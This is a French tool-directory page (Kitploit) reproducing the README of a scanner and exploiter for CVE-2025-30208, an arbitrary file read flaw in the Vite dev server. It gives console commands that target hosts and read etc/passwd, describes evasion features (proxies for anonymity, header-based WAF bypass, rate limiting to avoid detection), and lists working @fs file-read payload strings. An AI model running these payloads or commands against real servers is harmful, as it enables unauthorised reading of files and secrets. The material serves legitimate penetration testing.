Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichier de sévérité moyenne dans le serveur de développement Vite (un outil populaire de construction frontend). | Kitploit
Outils/GitHubGitHub/themehackers/cve-2025-30208
Scanners de VulnérabilitésGénération de PayloadsExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichier de sévérité moyenne dans le serveur de développement Vite (un outil populaire de construction frontend).

Voir le dépôt
1014il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Scanner de vulnérabilité de lecture arbitraire de fichier Vite CVE-2025-30208

Python License Security Status Modular

Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise

Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichier Vite

🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité


📖 Aperçu

Ceci est un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. Cette vulnérabilité permet un accès en lecture arbitraire de fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.

🎯 Ce que fait cet outil

  • Détecte les instances Vite vulnérables sur les réseaux
  • Exploite la vulnérabilité de lecture arbitraire de fichier en toute sécurité
  • Découvre les fichiers sensibles et les données de configuration
  • Rapporte les résultats dans plusieurs formats (HTML, JSON, Console)
  • Gère les sessions de scan et les configurations
  • Gère les erreurs avec élégance grâce à des mécanismes de réessai automatique

🏗️ Architecture modulaire

L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :

  • CVE-2025-30208.py - Application de scan principale
  • payloads.py - Charges utiles d'exploitation avancées (60+ variations)
  • sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)
  • html_template.py - Modèle de rapport HTML amélioré style hacker

🚀 Démarrage rapide

Prérequis

pip3 install -r requirements.txt

Utilisation de base

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Fonctionnalités

🔍 Détection de vulnérabilité principale

  • 60+ charges utiles avancées : techniques d'exploitation complètes pour une détection maximale
  • Détection intelligente : analyse intelligente des réponses pour éviter les faux positifs
  • Validation en temps réel : validation continue des réponses cibles
  • Tests complets : teste tous les points de terminaison vulnérables connus

🛡️ Fonctionnalités de sécurité améliorées

  • Support proxy : configuration proxy HTTP/HTTPS pour l'anonymat
  • En-têtes personnalisés : contourner WAF/IPS avec des en-têtes HTTP personnalisés
  • Limitation de débit : délais configurables pour éviter la détection
  • Gestion de session : sauvegarder et restaurer les sessions de scan
  • Validation d'entrée : validation complète des paramètres

🔧 Capacités avancées

  • Scan par lots : scan multi-thread de plusieurs cibles
  • Découverte de fichiers sensibles : découverte automatisée de plus de 200 fichiers sensibles
  • Test de connectivité : test des protocoles TCP/UDP/HTTP/HTTPS
  • Récupération d'erreur : réessai automatique avec backoff exponentiel
  • Journalisation complète : journaux détaillés avec horodatage

📊 Rapports et sortie

  • 🎨 Rapports HTML améliorés : superbes rapports de vulnérabilité style hacker avec animations
  • Export JSON : données structurées pour une analyse ultérieure
  • Sortie console : retour en temps réel avec codes couleur
  • Fichiers journaux : pistes d'audit détaillées
  • Interface Web interactive : serveur Web intégré pour visualiser les rapports

🔧 Guide d'utilisation

1. Configuration de base

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test de vulnérabilité

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scan par lots

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Découverte de fichiers sensibles

CVE-2025-30208 > scan

5. Configuration avancée

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Rapports HTML améliorés

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Référence des commandes

CommandeDescriptionExemple
set <option> <value>Définir les options de configurationset RHOST 192.168.1.100
show optionsAfficher les paramètres actuelsshow options
editÉditeur interactif d'optionsedit
run / exploitLancer le test de vulnérabilitérun
batchScanner plusieurs cibles par lotsbatch
scanDécouvrir les fichiers sensiblesscan
pullExporter les résultats en HTML/JSONpull
web [on|off|port]Serveur Web pour les rapports HTMLweb 8080
saveSauvegarder la configuration de sessionsave
loadCharger la configuration de sessionload
testTester la connectivité vers la cibletest
validateValider la configuration actuellevalidate
verboseActiver/désactiver le mode verbeuxverbose
proxyConfigurer les paramètres proxyproxy
headersDéfinir des en-têtes HTTP personnalisésheaders
rateConfigurer la limitation de débitrate
logAfficher les informations de journallog
help / ?Afficher l'aidehelp
exit / quitQuitter l'outilexit

⚙️ Options de configuration

OptionDescriptionDéfautValidation
RHOSTAdresse hôte/IP cible-Validation nom d'hôte/IP
RPORTNuméro de port cible-Plage de ports (1-65535)
FILEPATHChemin du fichier à testeretc/passwdValidation du chemin
PROXYURL du proxy HTTP/HTTPS-Validation du format URL
VERBOSEActiver la sortie verbeusefalseValidation booléenne
RATE_LIMITDélai entre les requêtes (secondes)0.3Validation numérique
THREADSNombre de threads pour le scan par lots5Validation entière
TIMEOUTDélai d'attente de requête (secondes)5Validation entière
CUSTOM_HEADERSEn-têtes HTTP personnalisés (JSON){}Validation du format JSON

🎨 Système de charges utiles amélioré

Le scanner utilise désormais plus de 60 variations de charges utiles organisées dans payloads.py :

Charges utiles @fs principales

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variations de paramètres étendus

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
Télécharger l’outil